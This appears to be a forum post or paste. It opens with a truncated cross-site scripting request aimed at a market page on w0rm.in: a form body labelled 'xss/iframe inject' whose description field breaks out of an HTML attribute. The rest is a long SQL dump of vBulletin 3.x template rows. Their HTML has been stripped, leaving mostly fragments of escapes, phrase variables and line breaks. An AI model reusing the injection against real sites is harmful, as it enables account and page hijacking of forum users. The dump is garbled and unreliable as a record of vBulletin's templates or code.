\r\n\r\n[url]http://w0rm.in/market/managetasklist.php?action=add&id=31[/url]\r\n\r\n[HTML]name=xss%2Fiframe+inject&desc=\">\r\n \") : (\"\r\n \r\n \")).\"\r\n
\r\n \r\n \r\n \r\n', '
\r\n $vbphrase[image_verification]\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n
', 'template', 1212486891, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1346, -1, 'im_aim', '
\\\"\"', '\"<phrase$vbphrase[send_message_via_aim_to_x]\" border=\"0\" />', 'template', 1119876670, 'vBulletin Solutions', '3.5.0 Beta 3', 'vbulletin'), (1347, -1, 'im_icq', '\\\"\"', '\"<phrase$vbphrase[send_message_via_icq_to_x]\" border=\"0\" />', 'template', 1119876683, 'vBulletin Solutions', '3.5.0 Beta 3', 'vbulletin'), (1348, -1, 'im_message', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . construct_phrase(\"$vbphrase[send_message_via_x_to_y]\", \"$typetext\", \"$userinfo[username]\") . \" - \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \"\r\n\r\n\r\n\r\n$imtext\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n<phrase 1=\"$typetext\" 2=\"$userinfo[username]\">$vbphrase[send_message_via_x_to_y]</phrase> - $vboptions[bbtitle]\r\n\r\n\r\n\r\n$imtext\r\n\r\n\r\n', 'template', 1195729860, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1349, -1, 'im_msn', '\\\"\"', '\"<phrase$vbphrase[send_message_via_msn_to_x]\" border=\"0\" />', 'template', 1119876702, 'vBulletin Solutions', '3.5.0 Beta 3', 'vbulletin'), (1350, -1, 'im_send_aim', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
\r\n $vbphrase[close_this_window]\r\n $vbphrase[aim]\r\n
\r\n
\r\n
\r\n\r\n
\r\n \\\"\\\"\r\n \" . construct_phrase(\"$vbphrase[send_message_via_aim_to_x_link]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$userinfo[userid]\", \"$userinfo[username]\") . \" ($userinfo[aim])\r\n
\r\n\r\n \r\n\r\n \r\n\r\n
\r\n $vbphrase[these_functions_require_aim]\r\n
\r\n\r\n
\r\n
\r\n
', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
\r\n $vbphrase[close_this_window]\r\n $vbphrase[aim]\r\n
\r\n
\r\n
\r\n\r\n
\r\n \"\"\r\n $vbphrase[send_message_via_aim_to_x_link] ($userinfo[aim])\r\n
\r\n\r\n \r\n\r\n \r\n\r\n
\r\n $vbphrase[these_functions_require_aim]\r\n
\r\n\r\n
\r\n
\r\n
', 'template', 1131124247, 'vBulletin Solutions', '3.5.2', 'vbulletin'), (1351, -1, 'im_send_icq', '
\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
\r\n $vbphrase[close_this_window]\r\n $vbphrase[icq]\r\n
\r\n
\r\n
\r\n\r\n
\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n \\\"$vbphrase[online_status]\\\"\r\n \\\"\\\"\r\n \" . construct_phrase(\"$vbphrase[send_message_via_icq_to_x_link]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$userinfo[userid]\", \"$userinfo[username]\") . \" ($userinfo[icq])\r\n
\r\n $vbphrase[from]:
\r\n userinfo[\'username\'] . \"\\\" size=\\\"40\\\" />\r\n
\r\n $vbphrase[email_address]:
\r\n userinfo[\'email\'] . \"\\\" size=\\\"40\\\" dir=\\\"ltr\\\" />\r\n
\r\n $vbphrase[message]:
\r\n \r\n
\r\n
\r\n\r\n
\r\n
\r\n\r\n
\r\n \r\n \r\n \r\n
\r\n
\r\n\r\n
', '
\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
\r\n $vbphrase[close_this_window]\r\n $vbphrase[icq]\r\n
\r\n
\r\n
\r\n\r\n
\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n \"$vbphrase[online_status]\"\r\n \"\"\r\n $vbphrase[send_message_via_icq_to_x_link] ($userinfo[icq])\r\n
\r\n $vbphrase[from]:
\r\n \r\n
\r\n $vbphrase[email_address]:
\r\n \r\n
\r\n $vbphrase[message]:
\r\n \r\n
\r\n
\r\n\r\n
\r\n
\r\n\r\n
\r\n \r\n \r\n \r\n
\r\n
\r\n\r\n
', 'template', 1206451803, 'vBulletin Solutions', '3.7.0 Release Candidate 2', 'vbulletin'), (1352, -1, 'im_send_msn', '\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
\r\n $vbphrase[close_this_window]\r\n $vbphrase[msn]\r\n
\r\n
\r\n
\r\n\r\n
\r\n \\\"\\\"\r\n \" . construct_phrase(\"$vbphrase[send_message_via_msn_to_x_link]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$userinfo[userid]\", \"$userinfo[username]\") . \" ($userinfo[msn])\r\n
\r\n\r\n \r\n\r\n \r\n\r\n
\r\n $vbphrase[these_functions_require_msn]\r\n
\r\n\r\n
\r\n
\r\n
', '\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
\r\n $vbphrase[close_this_window]\r\n $vbphrase[msn]\r\n
\r\n
\r\n
\r\n\r\n
\r\n \"\"\r\n $vbphrase[send_message_via_msn_to_x_link] ($userinfo[msn])\r\n
\r\n\r\n \r\n\r\n \r\n\r\n
\r\n $vbphrase[these_functions_require_msn]\r\n
\r\n\r\n
\r\n
\r\n
', 'template', 1165255282, 'vBulletin Solutions', '3.6.6', 'vbulletin'), (1353, -1, 'im_send_skype', '\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
\r\n $vbphrase[close_this_window]\r\n $vbphrase[skype]\r\n
\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\\\"$vbphrase[skype]\\\"\" . construct_phrase(\"$vbphrase[send_message_via_skype_to_x_link]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$userinfo[userid]\", \"$userinfo[username]\") . \" ($userinfo[skype])
\r\n \\\"$vbphrase[online_status]\\\"\r\n
\\\"$vbphrase[skype_view_profile]\\\"$vbphrase[skype_view_profile]\\\"$vbphrase[skype_add_contact]\\\"$vbphrase[skype_add_contact]
\\\"$vbphrase[skype_start_call]\\\"$vbphrase[skype_start_call]\\\"$vbphrase[skype_start_chat]\\\"$vbphrase[skype_start_chat]
\\\"$vbphrase[skype_leave_voicemail]\\\"$vbphrase[skype_leave_voicemail]\\\"$vbphrase[skype_send_file]\\\"$vbphrase[skype_send_file]
$vbphrase[these_functions_require_skype]
\r\n\r\n
\r\n
\r\n
', '\r\n\r\n\r\n \r\n\r\n\r\n \r\n\r\n
\r\n $vbphrase[close_this_window]\r\n $vbphrase[skype]\r\n
\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\"$vbphrase[skype]\"$vbphrase[send_message_via_skype_to_x_link] ($userinfo[skype])
\r\n \"$vbphrase[online_status]\"\r\n
\"$vbphrase[skype_view_profile]\"$vbphrase[skype_view_profile]\"$vbphrase[skype_add_contact]\"$vbphrase[skype_add_contact]
\"$vbphrase[skype_start_call]\"$vbphrase[skype_start_call]\"$vbphrase[skype_start_chat]\"$vbphrase[skype_start_chat]
\"$vbphrase[skype_leave_voicemail]\"$vbphrase[skype_leave_voicemail]\"$vbphrase[skype_send_file]\"$vbphrase[skype_send_file]
$vbphrase[these_functions_require_skype]
\r\n\r\n
\r\n
\r\n
', 'template', 1200590527, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'), (1354, -1, 'im_send_yahoo', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
\r\n $vbphrase[close_this_window]\r\n $vbphrase[yahoo]\r\n
\r\n
\r\n
\r\n\r\n
\r\n \\\"$vbphrase[online_status]\\\"\r\n \\\"\\\"\r\n \" . construct_phrase(\"$vbphrase[send_message_via_yahoo_to_x_link]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$userinfo[userid]\", \"$userinfo[username]\") . \" ($userinfo[yahoo])\r\n
\r\n\r\n \r\n\r\n \r\n\r\n
\r\n
\r\n
', '\r\n\r\n \r\n\r\n\r\n \r\n\r\n
\r\n $vbphrase[close_this_window]\r\n $vbphrase[yahoo]\r\n
\r\n
\r\n
\r\n\r\n
\r\n \"$vbphrase[online_status]\"\r\n \"\"\r\n $vbphrase[send_message_via_yahoo_to_x_link] ($userinfo[yahoo])\r\n
\r\n\r\n \r\n\r\n \r\n\r\n
\r\n
\r\n
', 'template', 1222166916, 'vBulletin Solutions', '3.8.0 Alpha 2', 'vbulletin'), (1355, -1, 'im_skype', 'options[\'skypeweb_gfx\']) ? (\"http://mystatus.skype.com/smallicon/$userinfo[skypeencoded]\") : (\"$stylevar[imgdir_misc]/im_skype.gif\")).\"\\\" alt=\\\"\" . construct_phrase(\"$vbphrase[send_message_via_skype_to_x]\", \"$userinfo[username]\") . \"\\\" border=\\\"0\\\" />', 'http://mystatus.skype.com/smallicon/$userinfo[skypeencoded]$stylevar[imgdir_misc]/im_skype.gif\" alt=\"$vbphrase[send_message_via_skype_to_x]\" border=\"0\" />', 'template', 1193048443, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1356, -1, 'im_yahoo', '\\\"\"', '\"<phrase$vbphrase[send_message_via_yahoo_to_x]\" border=\"0\" />', 'template', 1119876714, 'vBulletin Solutions', '3.5.0 Beta 3', 'vbulletin'), (1357, -1, 'MEMBERINFO', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\r\n$usercss\r\n$memberinfo_css\r\n\r\n\r\n\r\n\r\n\r\n\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[view_profile]: $userinfo[username]\r\n\r\n\".(($userinfo[\'userid\'] == $GLOBALS[\'vbulletin\']->userinfo[\'userid\']) ? (\"\r\n\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n
\r\n\r\n
\r\n
\r\n\r\n
\r\n \r\n \r\n \".(($blocks[\'profile_picture\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n
$blocks[profile_picture]\r\n \".(($prepared[\'rank\'] OR $prepared[\'reputationdisplay\']) ? (\"\r\n
\r\n \".(($prepared[\'reputationdisplay\']) ? (\"\r\n
$prepared[reputationdisplay]
\r\n \") : (\"\")).\"\r\n \".(($prepared[\'rank\']) ? (\"\r\n
$prepared[rank]
\r\n \") : (\"\")).\"\r\n
\r\n \") : (\"\")).\"\r\n

$prepared[musername] $prepared[onlinestatus]

\r\n \".(($prepared[\'usertitle\']) ? (\"\r\n

$prepared[usertitle]

\r\n \") : (\"\")).\"\r\n
\r\n\r\n \r\n \r\n \r\n\r\n \r\n \r\n\r\n \".(($show[\'contactlinks\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
\r\n\r\n
\r\n $template_hook[profile_left_first]\r\n $blocks[visitor_messaging]\r\n $blocks[aboutme]\r\n $blocks[stats]\r\n $blocks[friends]\r\n $blocks[infractions]\r\n $blocks[contactinfo]\r\n $template_hook[profile_left_last]\r\n
\r\n\r\n \r\n\r\n
\r\n
\r\n\r\n
\r\n \r\n $template_hook[profile_right_first]\r\n $blocks[stats_mini]\r\n $template_hook[profile_right_mini]\r\n $blocks[friends_mini]\r\n $blocks[albums]\r\n $template_hook[profile_right_album]\r\n $blocks[groups]\r\n $blocks[visitors]\r\n $template_hook[profile_right_last]\r\n \r\n
\r\n\r\n\r\n
\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\r\n$usercss\r\n$memberinfo_css\r\n\r\n\r\n\r\n\r\n\r\n\r\n$vboptions[bbtitle] - $vbphrase[view_profile]: $userinfo[username]\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n
\r\n\r\n
\r\n
\r\n\r\n
\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
$blocks[profile_picture] class=\"profilepic_adjacent\">\r\n \r\n
\r\n \r\n
$prepared[reputationdisplay]
\r\n
\r\n \r\n
$prepared[rank]
\r\n
\r\n
\r\n
\r\n

$prepared[musername] $prepared[onlinestatus]

\r\n \r\n

$prepared[usertitle]

\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n\r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n
\r\n $template_hook[profile_left_first]\r\n $blocks[visitor_messaging]\r\n $blocks[aboutme]\r\n $blocks[stats]\r\n $blocks[friends]\r\n $blocks[infractions]\r\n $blocks[contactinfo]\r\n $template_hook[profile_left_last]\r\n
\r\n\r\n \r\n\r\n
\r\n
\r\n\r\n
\r\n \r\n $template_hook[profile_right_first]\r\n $blocks[stats_mini]\r\n $template_hook[profile_right_mini]\r\n $blocks[friends_mini]\r\n $blocks[albums]\r\n $template_hook[profile_right_album]\r\n $blocks[groups]\r\n $blocks[visitors]\r\n $template_hook[profile_right_last]\r\n \r\n
\r\n\r\n\r\n
\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1249925853, 'vBulletin Solutions', '3.8.4', 'vbulletin'), (1358, -1, 'memberinfo_albumbit', '
  • \r\n \".(($album[\'coverthumburl\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"albumid=$album[albumid]\\\">\\\"$album[title_html]\\\"\r\n \") : (\"\")).\"\r\n \r\n\r\n \".(($album[\'lastpicturedate\']) ? (\"\r\n
    $album[picturedate]\".((!$show[\'detailedtime\']) ? (\" $album[picturetime]\") : (\"\")).\"\r\n \") : (\"\r\n
    $vbphrase[n_a]\r\n \")).\"\r\n \".(($show[\'moderated\']) ? (\" \\\"\"\") : (\"\")).\"\r\n
    \r\n
  • ', '
  • \r\n \r\n \"$album[title_html]\"\r\n \r\n \r\n\r\n \r\n
    $album[picturedate] $album[picturetime]\r\n \r\n
    $vbphrase[n_a]\r\n \r\n \"<phrase$vbphrase[x_moderated_pictures]\" />\r\n
    \r\n
  • ', 'template', 1203660803, 'vBulletin Solutions', '3.7.0 Beta 6', 'vbulletin'), (1359, -1, 'memberinfo_block', '\r\n
    \r\n

    \r\n \\\"\\\"\r\n \r\n $title\r\n

    \r\n
    $html
    \r\n
    \r\n', '\r\n
    \r\n

    \r\n \"\"\r\n \r\n $title\r\n

    \r\n
    $html
    \r\n
    \r\n', 'template', 1197973387, 'vBulletin Solutions', '3.7.0 Beta 3', 'vbulletin'), (1360, -1, 'memberinfo_block_aboutme', '
    \r\n\".(($show[\'simple_link\']) ? (\"\r\n \r\n\") : (\"\")).\"\r\n\".(($show[\'edit_link\']) ? (\"\r\n \r\n\") : (\"\")).\"\r\n
      \r\n $block_data[fields]\r\n \".(($prepared[\'signature\']) ? (\"\r\n
    • \r\n $vbphrase[signature]\r\n
      $prepared[signature]
      \r\n
    • \r\n \") : (\"\")).\"\r\n
    \r\n
    ', '
    \r\n\r\n \r\n\r\n\r\n \r\n\r\n
      \r\n $block_data[fields]\r\n \r\n
    • \r\n $vbphrase[signature]\r\n
      $prepared[signature]
      \r\n
    • \r\n
      \r\n
    \r\n
    ', 'template', 1227014875, 'vBulletin Solutions', '3.8.0 Beta 3', 'vbulletin'), (1361, -1, 'memberinfo_block_albums', '\".(($block_data[\'albumbits\']) ? (\"\r\n
      \r\n $block_data[albumbits]\r\n
    \r\n \r\n\") : (\"\r\n
    $vbphrase[you_have_not_created_any_albums]
    \r\n \r\n\")).\"\r\n', '\r\n
      \r\n $block_data[albumbits]\r\n
    \r\n \r\n\r\n
    $vbphrase[you_have_not_created_any_albums]
    \r\n \r\n
    \r\n', 'template', 1194961850, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1362, -1, 'memberinfo_block_contactinfo', '
    \r\n\".(($show[\'messagelinks\']) ? (\"\r\n
    \r\n \" . construct_phrase(\"$vbphrase[send_message_to_x]\", \"$prepared[username]\") . \"\r\n \r\n
    \r\n\") : (\"\")).\"\r\n\r\n \".(($prepared[\'hasimdetails\']) ? (\"\r\n
    \r\n $vbphrase[instant_messaging]\r\n
    \r\n
    \" . construct_phrase(\"$vbphrase[send_instant_message_to_x_using]\", \"$prepared[username]\") . \"
    \r\n
      \r\n $block_data[imbits]\r\n
    \r\n
    \r\n
    \r\n \") : (\"\")).\"\r\n\r\n
    \r\n \".(($prepared[\'displayemail\']) ? (\"\r\n
    $vbphrase[email_address]
    \r\n
    $prepared[displayemail]
    \r\n \") : (\"\")).\"\r\n \".(($prepared[\'homepage\']) ? (\"\r\n
    $vbphrase[home_page]
    \r\n
    $prepared[homepage]
    \r\n \") : (\"\")).\"\r\n
    $vbphrase[this_page]
    \r\n
    $prepared[profileurl]
    \r\n \".(($show[\'vcard\']) ? (\"\r\n
    $vbphrase[vcard]
    \r\n
    session->vars[\'sessionurl\'] . \"do=vcard&u=$prepared[userid]\\\" rel=\\\"nofollow\\\">$vbphrase[download_vcard]
    \r\n \") : (\"\")).\"\r\n
    \r\n
    ', '
    \r\n\r\n
    \r\n $vbphrase[send_message_to_x]\r\n
    \r\n \r\n
    \r\n
    \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[instant_messaging]\r\n
    \r\n
    $vbphrase[send_instant_message_to_x_using]
    \r\n
      \r\n $block_data[imbits]\r\n
    \r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n \r\n
    $vbphrase[email_address]
    \r\n
    $prepared[displayemail]
    \r\n
    \r\n \r\n
    $vbphrase[home_page]
    \r\n
    $prepared[homepage]
    \r\n
    \r\n
    $vbphrase[this_page]
    \r\n
    $prepared[profileurl]
    \r\n \r\n
    $vbphrase[vcard]
    \r\n
    $vbphrase[download_vcard]
    \r\n
    \r\n
    \r\n
    ', 'template', 1280346984, 'vBulletin Solutions', '3.8.5', 'vbulletin'), (1363, -1, 'memberinfo_block_friends', '\".(($block_data[\'friendbits\']) ? (\"\r\n
    \r\n \".(($prepared[\'myprofile\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=buddylist\\\">$vbphrase[edit_your_friends_list]\r\n \") : (\"\".(($prepared[\'canbefriend\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=addlist&userlist=friend&u=$prepared[userid]\\\">\" . construct_phrase(\"$vbphrase[befriend_x]\", \"$prepared[username]\") . \"\r\n \") : (\"\")).\"\")).\"\r\n \" . construct_phrase(\"$vbphrase[showing_friends_x_to_y_of_z]\", \"$block_data[start_friends]\", \"$block_data[end_friends]\", \"$prepared[friendcount]\") . \"\r\n
    \r\n
      \r\n $block_data[friendbits]\r\n
    \r\n \".(($block_data[\'pagenav\']) ? (\"\r\n
    \r\n $block_data[pagenav]\r\n
    \r\n \") : (\"\")).\"\r\n\") : (\"\r\n
    \r\n \".(($prepared[\'myprofile\']) ? (\"\r\n $vbphrase[your_friends_list_is_empty]\r\n \") : (\"\r\n \" . construct_phrase(\"$vbphrase[x_has_not_made_any_friends_yet]\", \"$prepared[username]\") . \"\r\n \")).\"\r\n
    \r\n \".(($prepared[\'myprofile\'] OR $prepared[\'canbefriend\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\")).\"', '\r\n
    \r\n \r\n $vbphrase[edit_your_friends_list]\r\n \r\n $vbphrase[befriend_x]\r\n \r\n $vbphrase[showing_friends_x_to_y_of_z]\r\n
    \r\n
      \r\n $block_data[friendbits]\r\n
    \r\n \r\n
    \r\n $block_data[pagenav]\r\n
    \r\n
    \r\n\r\n
    \r\n \r\n $vbphrase[your_friends_list_is_empty]\r\n \r\n $vbphrase[x_has_not_made_any_friends_yet]\r\n \r\n
    \r\n \r\n \r\n \r\n
    ', 'template', 1200666301, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'), (1364, -1, 'memberinfo_block_friends_mini', '
    \r\n \".(($block_data[\'friendbits\']) ? (\"\r\n
    \" . construct_phrase(\"$vbphrase[showing_x_of_y_friends]\", \"$block_data[showtotal]\", \"$prepared[friendcount]\") . \"
    \r\n
      $block_data[friendbits]
    \r\n \") : (\"\".(($prepared[\'myprofile\']) ? (\"\r\n $vbphrase[your_friends_list_is_empty]\r\n \") : (\"\r\n \" . construct_phrase(\"$vbphrase[x_has_not_made_any_friends_yet]\", \"$prepared[username]\") . \"\r\n \")).\"\")).\"\r\n
    \r\n
    \r\n \".(($prepared[\'myprofile\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=buddylist\\\">$vbphrase[edit_your_friends_list]\r\n \") : (\"\".(($prepared[\'canbefriend\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=addlist&userlist=friend&u=$prepared[userid]\\\">\" . construct_phrase(\"$vbphrase[befriend_x]\", \"$prepared[username]\") . \"\r\n \") : (\"\")).\"\")).\"\r\n \".(($block_data[\'friendbits\']) ? (\"\r\n $vbphrase[show_all_friends]\r\n \") : (\"\r\n  \r\n \")).\"\r\n
    ', '
    \r\n \r\n
    $vbphrase[showing_x_of_y_friends]
    \r\n
      $block_data[friendbits]
    \r\n \r\n $vbphrase[your_friends_list_is_empty]\r\n \r\n $vbphrase[x_has_not_made_any_friends_yet]\r\n
    \r\n
    \r\n
    \r\n \r\n $vbphrase[edit_your_friends_list]\r\n \r\n $vbphrase[befriend_x]\r\n \r\n \r\n $vbphrase[show_all_friends]\r\n \r\n  \r\n \r\n
    ', 'template', 1200666309, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'), (1365, -1, 'memberinfo_block_groups', '\".(($block_data[\'membergroupcount\']) ? (\"\r\n
    \r\n ($block_data[membergroupcount]) $vbphrase[public_usergroups]:\r\n
      \r\n $block_data[membergroupbits]\r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\".(($block_data[\'socialgroupcount\']) ? (\"\r\n
    \r\n ($block_data[socialgroupcount]) $vbphrase[user_created_social_groups]:\r\n
      \r\n $block_data[socialgroupbits]\r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n\".((!$block_data[\'membergroupcount\'] AND !$block_data[\'socialgroupcount\']) ? (\"\r\n
    $vbphrase[you_not_member_any_groups]
    \r\n\") : (\"\")).\"\r\n\".(($block_data[\'show_join_link\']) ? (\"\r\n \r\n\") : (\"\")).\"', '\r\n
    \r\n ($block_data[membergroupcount]) $vbphrase[public_usergroups]:\r\n
      \r\n $block_data[membergroupbits]\r\n
    \r\n
    \r\n
    \r\n\r\n
    \r\n ($block_data[socialgroupcount]) $vbphrase[user_created_social_groups]:\r\n
      \r\n $block_data[socialgroupbits]\r\n
    \r\n
    \r\n
    \r\n\r\n
    $vbphrase[you_not_member_any_groups]
    \r\n
    \r\n\r\n \r\n', 'template', 1218539988, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1366, -1, 'memberinfo_block_infractions', '\r\n\r\n \r\n\r\n\".(($block_data[\'infractionbits\']) ? (\"\r\n\r\n \r\n \r\n \r\n \r\n \".(($show[\'reverse\']) ? (\"\") : (\"\")).\"\r\n\r\n\r\n$block_data[infractionbits]\r\n\") : (\"\")).\"\r\n
    \r\n \" . construct_phrase(\"$vbphrase[x_points_total]\", \"$userinfo[ipoints]\") . \"\r\n \".(($show[\'giveinfraction\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=report&u=$userinfo[userid]\\\">$vbphrase[give_infraction]\r\n \") : (\"\")).\"\r\n
     $vbphrase[post] / $vbphrase[reason]$vbphrase[date] / $vbphrase[posted_by]$vbphrase[points] / $vbphrase[expires]$vbphrase[view]
    \r\n\r\n\".(($block_data[pagenav]) ? (\"\r\n
    \r\n \r\n \r\n \r\n \r\n
    $block_data[pagenav]
    \r\n
    \r\n\") : (\"\")).\"', '\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n$block_data[infractionbits]\r\n\r\n
    54\">\r\n $vbphrase[x_points_total]\r\n \r\n $vbphrase[give_infraction]\r\n \r\n
     $vbphrase[post] / $vbphrase[reason]$vbphrase[date] / $vbphrase[posted_by]$vbphrase[points] / $vbphrase[expires]$vbphrase[view]
    \r\n\r\n\r\n
    \r\n \r\n \r\n \r\n \r\n
    $block_data[pagenav]
    \r\n
    \r\n
    ', 'template', 1212413850, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1367, -1, 'memberinfo_block_ministats', '
    \r\n \r\n \r\n \r\n \".(($prepared[\'avatarurl\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n
    \r\n
    \r\n \".(($prepared[\'birthday\']) ? (\"\r\n
    $vbphrase[birth_date]
    \r\n
    $prepared[birthday] \".(($prepared[\'age\']) ? (\"($prepared[age])\") : (\"\")).\"
    \r\n \") : (\"\".(($prepared[\'age\']) ? (\"\r\n
    $vbphrase[age]
    \r\n
    $prepared[age]
    \r\n \") : (\"\")).\"\")).\"\r\n
    $vbphrase[join_date]
    \r\n
    $prepared[joindate]
    \r\n
    $vbphrase[total_posts]
    \r\n
    $prepared[posts]
    \r\n $template_hook[profile_ministats_list]\r\n
    \r\n
    \\\"\"
    \r\n
    \r\n', '
    \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
    \r\n
    \r\n \r\n
    $vbphrase[birth_date]
    \r\n
    $prepared[birthday] ($prepared[age])
    \r\n \r\n
    $vbphrase[age]
    \r\n
    $prepared[age]
    \r\n
    \r\n
    $vbphrase[join_date]
    \r\n
    $prepared[joindate]
    \r\n
    $vbphrase[total_posts]
    \r\n
    $prepared[posts]
    \r\n $template_hook[profile_ministats_list]\r\n
    \r\n
    \"<phrase$vbphrase[xs_avatar]\" $prepared[avatarsize] class=\"alt2\" id=\"user_avatar\" />
    \r\n
    \r\n', 'template', 1196961753, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1368, -1, 'memberinfo_block_profilefield', '\".(($show[\'profile_category_title\']) ? (\"\r\n
      \r\n$block_data[fields]\r\n
    \r\n\") : (\"\r\n$block_data[fields]\r\n\")).\"', '\r\n
      \r\n$block_data[fields]\r\n
    \r\n\r\n$block_data[fields]\r\n
    ', 'template', 1194528568, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1369, -1, 'memberinfo_block_profilepicture', '\\\"\"', '\"<phrase$vbphrase[xs_picture]\" />', 'template', 1215173058, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'), (1370, -1, 'memberinfo_block_recentvisitors', '\".(($block_data[\'visitorcount\']) ? (\"\r\n
    \r\n \" . construct_phrase(\"$vbphrase[last_x_visitors]\", \"$block_data[visitorcount]\") . \"\r\n
      \r\n $block_data[visitorbits]\r\n
    \r\n
    \r\n\") : (\"\")).\"\r\n
    \r\n \" . construct_phrase(\"$vbphrase[this_page_has_x_visits]\", \"$prepared[profilevisits]\") . \"\r\n
    ', '\r\n
    \r\n $vbphrase[last_x_visitors]\r\n
      \r\n $block_data[visitorbits]\r\n
    \r\n
    \r\n
    \r\n
    alt2alt1 smallfont block_row block_footer\">\r\n $vbphrase[this_page_has_x_visits]\r\n
    ', 'template', 1196289604, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'), (1371, -1, 'memberinfo_block_statistics', '
    \r\n $template_hook[profile_stats_first]\r\n\r\n
    \r\n $vbphrase[total_posts]\r\n \r\n
    \r\n\r\n \".(($show[\'album_block\']) ? (\"\r\n
    \r\n $vbphrase[albums]\r\n \r\n
    \r\n \") : (\"\")).\"\r\n \".(($show[\'vm_block\']) ? (\"\r\n
    \r\n $vbphrase[visitor_messages]\r\n \r\n
    \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'usernote_block\']) ? (\"\r\n
    \r\n $vbphrase[user_notes]\r\n \r\n
    \r\n \") : (\"\")).\"\r\n\r\n $template_hook[profile_stats_pregeneral]\r\n\r\n
    \r\n $vbphrase[general_information]\r\n
      \r\n \".(($prepared[\'lastactivitydate\']) ? (\"\r\n
    • $vbphrase[last_activity]: $prepared[lastactivitydate] \".((!$show[\'detailedtime\']) ? (\"$prepared[lastactivitytime]\") : (\"\")).\"
    • \r\n \") : (\"\")).\"\r\n \".(($prepared[\'action\']) ? (\"\r\n
    • $vbphrase[current_activity]: $prepared[action] $prepared[where]
    • \r\n \") : (\"\")).\"\r\n
    • $vbphrase[join_date]: $prepared[joindate]
    • \r\n \".(($GLOBALS[\'vbulletin\']->options[\'usereferrer\']) ? (\"
    • $vbphrase[referrals]: $prepared[referrals]
    • \") : (\"\")).\"\r\n \".(($prepared[\'homepage\']) ? (\"\r\n
    • $vbphrase[home_page]: $prepared[homepage]
    • \r\n \") : (\"\")).\"\r\n
    \r\n
    \r\n\r\n $template_hook[profile_stats_last]\r\n
    ', '
    \r\n $template_hook[profile_stats_first]\r\n\r\n
    \r\n $vbphrase[total_posts]\r\n \r\n
    \r\n\r\n \r\n
    \r\n $vbphrase[albums]\r\n
      \r\n
